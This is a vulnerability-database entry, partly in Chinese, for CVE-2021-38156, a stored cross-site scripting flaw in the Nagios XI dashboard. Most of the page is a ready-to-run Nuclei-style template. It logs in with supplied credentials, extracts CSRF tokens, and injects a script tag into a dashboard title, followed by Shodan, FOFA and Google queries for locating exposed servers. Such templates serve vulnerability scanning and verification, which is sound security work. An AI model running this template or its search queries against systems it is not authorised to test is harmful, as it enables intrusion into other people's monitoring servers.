CVE-2021-38156: Nagios XI < 5.8.6 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Nagios XI | POC: 已公开

漏洞描述

In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.

PoC代码[已公开]

id: CVE-2021-38156

info:
  name: Nagios XI < 5.8.6 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.
  reference:
    - https://raxis.com/blog/cve-2021-38156/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38156
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-38156
    cwe-id: CWE-79
    epss-score: 0.86031
    epss-percentile: 0.99353
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    verified: true
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query: app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2021,nagios,nagiosxi,xss,authenticated

http:
  - raw:
      - |
        GET /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}

      - |
        GET /nagiosxi/index.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /nagiosxi/ajaxhelper.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        cmd=updatedashboard&id=home&opts=&title="><script>alert(document.domain)</script>&background=&transparent=0&submitButton=Submit&nsp={{nsp_auth}}

      - |
        GET /nagiosxi/dashboards/manage.php HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body_5
        words:
          - 'data-title=""><script>alert(document.domain)</script>'

      - type: word
        part: header_5
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nsp
        part: body
        group: 1
        regex:
          - "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
        internal: true

      - type: regex
        name: nsp_auth
        part: body
        group: 1
        regex:
          - "var nsp_str = ['\"](.*)['\"];"
        internal: true
# digest: 490a0046304402205d171cd950b39dae8946ebf00a44b24ca449426a96773fe1712fbc9428a6b46a02202bff9d5d0f44d25f2bc44e74c5f77f26d72ce7811b14424b487867b5c1368b93:922c64590222798bb761d5b6d8e72950

相关漏洞推荐